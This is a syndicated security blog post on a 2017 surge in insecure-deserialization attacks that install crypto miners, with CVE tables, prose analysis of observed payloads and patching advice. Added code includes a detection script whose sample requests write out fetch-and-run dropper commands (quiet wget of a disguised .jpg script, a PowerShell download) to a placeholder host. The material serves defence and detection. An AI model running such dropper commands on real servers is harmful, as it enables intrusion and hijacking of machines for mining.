Deserialization Attacks Surge Motivated by Illegal Crypto-mining

Imperva’s research group is constantly monitoring new web application vulnerabilities. In doing so, we’ve noticed at least four major insecure deserialization vulnerabilities that were published in the past year.

Our analysis shows that, in the past three months, the number of deserialization attacks has grown by 300 percent on average, turning them into a serious security risk to web applications.

To make things worse, many of these attacks are now launched with the intent of installing crypto-mining malware on vulnerable web servers, which gridlocks their CPU usage.

In this blog post we will explain what insecure deserialization vulnerabilities are, show the growing trend of attacks exploiting these vulnerabilities and explain what attackers do to exploit them (including real-life attack examples).

What Is Serialization?

The process of serialization converts a “live” object (structure and/or state), like a Java object, into a format that can be sent over the network, or stored in memory or on disk. Deserialization converts the format back into a “live” object.

The purpose of serialization is to preserve an object, meaning that the object will exist outside the lifetime of the local machine on which it is created.

For example, when withdrawing money from an ATM, the information of the account holder and the required operation is stored in a local object. Before this object is sent to the main server, it is serialized in order to perform and approve the needed operations. The server then deserializes the object to complete the operation.

Types of Serialization

There are many types of serialization available, depending on the object being serialized and on the purpose. Almost all modern programming languages support serialization. In Java, for example, an object is converted into a compact representation using a byte stream, and that byte stream can then be reverted back into a copy of the object.

Other types of serialization include converting an object into a hierarchical format like JSON or XML. The advantage of this serialization is that the serialized objects can be read as plain text, instead of a byte stream.
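The following is an added example, not code from the original post. The post's cases are Java byte streams and XML, but the security-relevant property is the same in Python's pickle: the serialized stream itself names the classes the deserializer will instantiate, which is why a deserializer that accepts any class from the input is dangerous. The example contrasts a byte-stream format with a text (JSON) format, and shows an allow-list on deserialization, the same idea as Java's ObjectInputFilter or the XStream type filtering that several of the CVEs below lack. The Withdrawal and AuditEvent classes and the sample values are constructed for this illustration.

```python
"""Byte-stream vs. text serialization, and an allow-list on deserialization.

Added example (not code from the original post). The Withdrawal/AuditEvent
classes and sample values are constructed for the illustration.
"""
import io
import json
import pickle
from dataclasses import asdict, dataclass


@dataclass
class Withdrawal:
    """The ATM-style object from the post: account holder plus operation."""
    account: str
    amount: int


@dataclass
class AuditEvent:
    """A second type, deliberately left off the allow-list below."""
    message: str


# Allow-list: (module, class name) -> class object. Only these may be built
# from a stream; everything else is refused before any object is created.
# Resolving from this dict (instead of importing by name) means the stream
# can never make the deserializer look up a class we did not register.
ALLOWED_CLASSES = {
    (Withdrawal.__module__, Withdrawal.__qualname__): Withdrawal,
}


class RestrictedUnpickler(pickle.Unpickler):
    """pickle.Unpickler resolves every class reference in the stream through
    find_class(); overriding it is the pickle analogue of Java's
    ObjectInputFilter or XStream's type filtering."""

    def find_class(self, module, name):
        cls = ALLOWED_CLASSES.get((module, name))
        if cls is None:
            raise pickle.UnpicklingError(f"refusing to load {module}.{name}")
        return cls


def to_bytes(obj) -> bytes:
    """Byte-stream serialization: opaque to a human, carries class names."""
    return pickle.dumps(obj, protocol=4)


def from_bytes(data: bytes):
    """Deserialize a byte stream, but only into allow-listed classes.
    Returns ("ok", object) or ("rejected", reason)."""
    try:
        return "ok", RestrictedUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError as exc:
        return "rejected", str(exc)


def to_json(obj: Withdrawal) -> str:
    """Text serialization: readable, and it carries data only, no class names."""
    return json.dumps(asdict(obj))


def from_json(text: str) -> Withdrawal:
    """The receiving side decides the type; the input cannot choose one."""
    fields = json.loads(text)
    return Withdrawal(account=str(fields["account"]), amount=int(fields["amount"]))


def stream_names_class(data: bytes, name: str) -> bool:
    """Show that the class name travels inside the byte stream in clear text."""
    return name.encode() in data


if __name__ == "__main__":
    w = Withdrawal("ACC-0001", 50)  # constructed sample
    blob = to_bytes(w)
    print(stream_names_class(blob, "Withdrawal"))  # True: class name is in the stream
    print(from_bytes(blob))                         # ('ok', Withdrawal(...))
    print(from_bytes(to_bytes(AuditEvent("x"))))   # ('rejected', 'refusing to load ...')
    print(to_json(w), from_json(to_json(w)) == w)   # readable text, round-trips
```

The point of the JSON half is that the hierarchical text formats the post mentions are only safer when the receiver fixes the target type itself, as from_json does; an XML or JSON deserializer that reads a class name out of the document (as the XStream and XMLDecoder cases below do) is in the same position as the byte-stream one.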

Deserialization Vulnerabilities from the Past Three Months

In the OWASP Top 10 security risks of 2017, insecure deserialization came in at eighth place, and rightfully so, as we argued in our previous blog post about the state of web application vulnerabilities in 2017.

In 2017, major new vulnerabilities related to insecure deserialization, mostly in Java, were published (see Figure 1).

Name | Release Date (Day/Month/Year) | Vulnerability details
CVE-2017-12149 | 01/08/2017 | Vulnerability in the JBoss Application Server allows execution of arbitrary code via crafted serialized data because the HTTP Invoker does not restrict classes for which it performs deserialization
CVE-2017-10271 | 21/06/2017 | Vulnerability in the Oracle WebLogic Server allows execution of arbitrary code due to insufficient sanitizing of user supplied inputs in the wls-wsat component
CVE-2017-9805 | 21/06/2017 | The REST Plugin in Apache Struts uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to remote code execution when deserializing XML payloads
CVE-2017-7504 | 05/04/2017 | The HTTPServerILServlet.java in JMS allows remote attackers to execute arbitrary code via crafted serialized data because it does not restrict the classes for which it performs deserialization

Figure 1: CVEs related to insecure deserialization

In order to understand the magnitude of these vulnerabilities, we analyzed attacks from the past three months (October to December of 2017) that try to exploit insecure deserialization. A key observation is the steep increase in deserialization attacks over the past few months, as can be seen in Figure 2.


Figure 2: Insecure deserialization attacks over the course of three months

Most of the attackers used no attack vectors other than insecure deserialization. We noticed that each attacker was trying to exploit different vulnerabilities, with the above-mentioned CVEs being the most prevalent.

For a full list of CVEs related to insecure deserialization from the past few years see Figure 3.

Name | Relevant System | Public Exploit
CVE-2017-9844 | SAP NetWeaver | Yes
CVE-2017-9830 | Code42 CrashPlan | No
CVE-2017-9805 | Apache Struts | Yes
CVE-2017-7504 | Red Hat JBoss | Yes
CVE-2017-5878 | Apache OpenMeetings | Yes
CVE-2017-5645 | Apache Log4j | No
CVE-2017-5641 | Apache BlazeDS | Yes
CVE-2017-5586 | OpenText Documentum D2 | Yes
CVE-2017-3159 | Apache Camel | Yes
CVE-2017-3066 | Adobe ColdFusion | Yes
CVE-2017-2608 | Jenkins | Yes
CVE-2017-12149 | Red Hat JBoss | Yes
CVE-2017-11284 | Adobe ColdFusion | No
CVE-2017-11283 | Adobe ColdFusion | No
CVE-2017-1000353 | CloudBees Jenkins | Yes
CVE-2016-9606 | Resteasy | Yes
CVE-2016-9299 | Jenkins | Yes
CVE-2016-8749 | Jackson (JSON) | Yes
CVE-2016-8744 | Apache Brooklyn | Yes
CVE-2016-8735 | Apache Tomcat JMX | Yes
CVE-2016-7462 | VMWare vRealize Operations | No
CVE-2016-6809 | Apache Tika | No
CVE-2016-5229 | Atlassian Bamboo | Yes
CVE-2016-5004 | Apache Archiva | Yes
CVE-2016-4385 | HP Network Automation | No
CVE-2016-4372 | HP iMC | No
CVE-2016-3642 | Solarwinds Virtualization Manager | Yes
CVE-2016-3461 | Oracle MySQL Enterprise Monitor | Yes
CVE-2016-3427 | JMX | Yes
CVE-2016-3415 | Zimbra Collaboration | No
CVE-2016-2510 | Red Hat JBoss BPM Suite | No
CVE-2016-2173 | Spring AMQP | No
CVE-2016-2170 | Apache OFBiz | No
CVE-2016-2003 | HP P9000, XP7 Command View Advanced Edition (CVAE) Suite | No
CVE-2016-2000 | HP Asset Manager | No
CVE-2016-1999 | HP Release Control | No
CVE-2016-1998 | HP Service Manager | No
CVE-2016-1997 | HP Operations Orchestration | No
CVE-2016-1986 | HP Continuous Delivery Automation | No
CVE-2016-1985 | HP Operations Manager | No
CVE-2016-1487 | Lexmark Markvision Enterprise | No
CVE-2016-1291 | Cisco Prime Infrastructure | Yes
CVE-2016-0958 | Adobe Experience Manager | No
CVE-2016-0788 | Jenkins | Yes
CVE-2016-0779 | Apache TomEE | No
CVE-2016-0714 | Apache Tomcat | No
CVE-2015-8765 | McAfee ePolicy Orchestrator | No
CVE-2015-8581 | Apache TomEE | No
CVE-2015-8545 | NetApp | No
CVE-2015-8360 | Atlassian Bamboo | No
CVE-2015-8238 | Unify OpenScape | No
CVE-2015-8237 | Unify OpenScape | No
CVE-2015-8103 | Jenkins | Yes
CVE-2015-7501 | Red Hat JBoss | Yes
CVE-2015-7501 | Oracle Application Testing Suite | No
CVE-2015-7450 | IBM Websphere | Yes
CVE-2015-7253 | Commvault Edge Server | Yes
CVE-2015-6934 | VMWare vCenter/vRealize | No
CVE-2015-6576 | Atlassian Bamboo | No
CVE-2015-6555 | Symantec Endpoint Protection Manager | Yes
CVE-2015-6420 | Cisco (various frameworks) | No
CVE-2015-5348 | Apache Camel | No
CVE-2015-5254 | Apache ActiveMQ | No
CVE-2015-4852 | Oracle WebLogic | Yes
CVE-2015-3253 | Jenkins | Yes
CVE-2012-4858 | IBM Cognos BI | No

Figure 3: CVEs related to insecure deserialization

Deserialization Attacks in the Wild

Most of the attacks we saw are related to byte-stream serialization of Java objects. We also saw some attacks related to serialization to XML and other formats (see Figure 4).


Figure 4: Distribution of vulnerabilities over different serialization formats

In the following attack (see Figure 5) the attacker is trying to exploit CVE-2017-10271. The payload is sent in the HTTP request’s body using a serialized Java object through XML representation.


Figure 5: Attack vector containing a serialized java array into an XML

The fact that this is a Java array can be seen from the hierarchical structure of the parameters, with the nested elements "java/void/array/void/string". The attacker is trying to run a bash script on the attacked server.

This bash script sends an HTTP request using the "wget" OS command to download a shell script disguised as a picture file (note the jpg file extension), then runs it. A few interesting observations can be made from this command:

  • The presence of shell and "wget" commands indicates that this payload targets Linux systems
  • Using a picture file extension is usually done to evade security controls
  • The "-q" parameter to "wget" stands for "quiet": "wget" produces no output to the console, so it is harder to notice that such a request was even made

Once the downloaded script runs, the server is infected with crypto-mining malware that mines Monero digital coins (a cryptocurrency similar to Bitcoin).

The next script (see Figure 6) tries to exploit the same vulnerability, but this time the payload is targeting Windows servers using cmd.exe and Powershell commands to download the malware and run it.


Figure 6: Attack vector trying to infect Windows server with crypto mining malware

This indicates that there are two different infection methods, one for Windows and one for Linux servers, each with its own designated script.

Another example is the following payload (Figure 7) that we pulled from an attack trying to exploit a deserialization vulnerability with a Java serialized object.


Figure 7: Attack vector containing a Java serialized object trying to download a crypto miner

The “bad” encoding is an artifact of Java serialization, where the object is represented as a byte stream.

Still, we can see a script in plain text, marked in yellow. Highlighted in the image is a variable that defines an internal field separator; in this case it simply stands for a space. The variable is probably used instead of a literal space to make the payload harder to detect.

Just as in the previous examples, this Bash script targets Linux servers, sending an HTTP request using “wget” to download a crypto miner.

Beyond Insecure Deserialization

The common denominator of the attacks above is that attackers are trying to infect the server with a crypto mining malware by using an insecure deserialization vulnerability. However insecure deserialization is not the only method to achieve this goal.

Below (Figure 8) we see an example of another attack payload, this time at the “Content-Type” header.


Figure 8: Attack vector using an RCE vulnerability of Apache Struts

This attack tries to exploit CVE-2017-5638, a well-known RCE vulnerability related to Apache Struts which was published in March 2017 and was covered in a previous blog post.

When it was originally published we saw no indications of crypto miners in the attacks’ payloads related to this CVE, and most of the payloads were reconnaissance attacks.

However, in this attack the payload (marked in yellow above) is very similar to the payload from the previous example. Using the same remote server and the exact same script, it infected the server with crypto mining malware.

This old attack method with a new payload suggests a new trend in the cyber arena – attackers try to exploit RCE vulnerabilities, new and old, to turn vulnerable servers into crypto miners and get a faster ROI for their “effort”.
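The following is an added example, not code from the original post and not an Imperva rule. It turns the traits the post points out in Figures 5 through 8 into request-level indicators a WAF or log pipeline could evaluate: the XML object-graph nesting (the java/void/array/void/string hierarchy) of Figures 5 and 6, the Java serialized byte stream of Figure 7 whether raw or base64-encoded, a payload carried in the Content-Type header as in Figure 8, and the dropper traits (a "quiet" wget, a download with a picture extension, the internal-field-separator variable standing in for a space, cmd.exe/PowerShell on Windows). The sample requests are constructed; EXAMPLE.invalid and the EXAMPLE.SomeClass and EXAMPLE_OGNL_PLACEHOLDER names are placeholders, not values from the observed attacks.

```python
"""Indicators for the deserialization/dropper payloads described in the post.

Added example (not code from the original post). Sample requests below are
constructed; EXAMPLE.* names are placeholders.
"""
import base64
import re

# Java serialization stream header: STREAM_MAGIC 0xACED, STREAM_VERSION 0x0005.
JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"
# Any base64 encoding of a stream that starts with the magic begins with this.
JAVA_STREAM_MAGIC_B64 = base64.b64encode(JAVA_STREAM_MAGIC)[:5]  # b"rO0AB"

# The element nesting the post points out for the XML-represented Java object.
XML_JAVA_OBJECT = re.compile(rb"<java\b[^>]*>.*?<void\b[^>]*>.*?<array\b", re.S | re.I)

# A "space" in the dropper may be whitespace or the IFS variable (Figure 7).
SP = rb"(?:\s|\$\{?IFS\}?)+"
QUIET_WGET = re.compile(rb"\bwget" + SP + rb"(?:-\w+" + SP + rb")*-q\b")
DOWNLOAD_IMAGE_EXT = re.compile(
    rb"\b(?:wget|curl|Invoke-WebRequest)\b[^;|&\n]*\.(?:jpg|jpeg|png|gif)\b", re.I)
IFS_SEPARATOR = re.compile(rb"\$\{?IFS\}?")
WINDOWS_SHELL = re.compile(rb"\b(?:cmd(?:\.exe)?|powershell)\b", re.I)


def scan_blob(data: bytes) -> set:
    """Indicator tags found in one header value or body."""
    tags = set()
    if JAVA_STREAM_MAGIC in data:
        tags.add("java-serialized-stream")
    if JAVA_STREAM_MAGIC_B64 in data:
        tags.add("java-serialized-stream-base64")
    if XML_JAVA_OBJECT.search(data):
        tags.add("xml-java-object-graph")
    if QUIET_WGET.search(data):
        tags.add("quiet-wget")
    if DOWNLOAD_IMAGE_EXT.search(data):
        tags.add("download-with-image-extension")
    if IFS_SEPARATOR.search(data):
        tags.add("ifs-as-space")
    if WINDOWS_SHELL.search(data):
        tags.add("windows-command-shell")
    return tags


def classify_request(headers: dict, body: bytes) -> list:
    """Sorted indicator tags for one request; an empty list means nothing matched.
    Headers are scanned too, because the Struts case carries the payload in
    Content-Type rather than in the body."""
    tags = scan_blob(body)
    for name, value in headers.items():
        found = scan_blob(value.encode() if isinstance(value, str) else value)
        if found:
            tags |= found
            tags.add("payload-in-header:" + name.lower())
    return sorted(tags)


XML_PREFIX = (b'<java version="1.8"><void class="EXAMPLE.SomeClass">'
              b'<array class="java.lang.String" length="3">')
XML_SUFFIX = b"</array></void></java>"

# Constructed sample requests, one per figure the post discusses.
SAMPLES = {
    "fig5_xml_linux": ({"Content-Type": "text/xml"}, XML_PREFIX
        + b"<void index=\"0\"><string>/bin/bash</string></void>"
        + b"<void index=\"1\"><string>-c</string></void>"
        + b"<void index=\"2\"><string>wget -q http://EXAMPLE.invalid/x.jpg -O /tmp/x.sh; sh /tmp/x.sh</string></void>"
        + XML_SUFFIX),
    "fig6_xml_windows": ({"Content-Type": "text/xml"}, XML_PREFIX
        + b"<void index=\"0\"><string>cmd.exe</string></void>"
        + b"<void index=\"1\"><string>/c</string></void>"
        + b"<void index=\"2\"><string>powershell -c \"Invoke-WebRequest http://EXAMPLE.invalid/m.jpg -OutFile m.exe\"</string></void>"
        + XML_SUFFIX),
    "fig7_raw_java": ({"Content-Type": "application/x-java-serialized-object"},
        JAVA_STREAM_MAGIC + b"sr\x00\x0bEXAMPLE.Foo\x00"
        + b"wget${IFS}-q${IFS}http://EXAMPLE.invalid/m.jpg${IFS}-O${IFS}/tmp/m"),
    "fig7_base64_java": ({"Content-Type": "application/x-www-form-urlencoded"},
        b"obj=" + base64.b64encode(JAVA_STREAM_MAGIC + b"sr\x00\x0bEXAMPLE.Foo")),
    "fig8_content_type": ({"Content-Type":
        "%{EXAMPLE_OGNL_PLACEHOLDER('wget -q http://EXAMPLE.invalid/m.jpg -O /tmp/m; sh /tmp/m')}"}, b""),
    "benign_json": ({"Content-Type": "application/json"},
        b'{"account":"ACC-0001","amount":50}'),
}


if __name__ == "__main__":
    for name, (headers, body) in SAMPLES.items():
        print(f"{name:20s} {classify_request(headers, body)}")
```

The stream-magic and base64-prefix checks are the cheapest signals and fire on any Java serialized object, legitimate or not, so in practice they are scoped to endpoints that should never receive one; the dropper indicators are what distinguish the crypto-mining campaigns the post describes from reconnaissance traffic.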

Recommendations

Given the many new vulnerabilities related to insecure deserialization that were discovered this year, and its appearance in the OWASP top 10 security risks, we expect to see newer related vulnerabilities released in 2018. In the meantime, organizations using affected servers are advised to use the latest patch to mitigate these vulnerabilities.

An alternative to manual patching is virtual patching. Virtual patching actively protects web applications from attacks, reducing the window of exposure and decreasing the cost of emergency patches and fix cycles.

A WAF that provides virtual patching doesn’t interfere with the normal application workflow, and keeps the site protected while allowing the site owners to control the patching process timeline.

Learn more about how to protect your web applications from vulnerabilities with Imperva WAF solutions.



This is a Security Bloggers Network syndicated blog post authored by Nadav Avital. Read the original post at: Blog | Imperva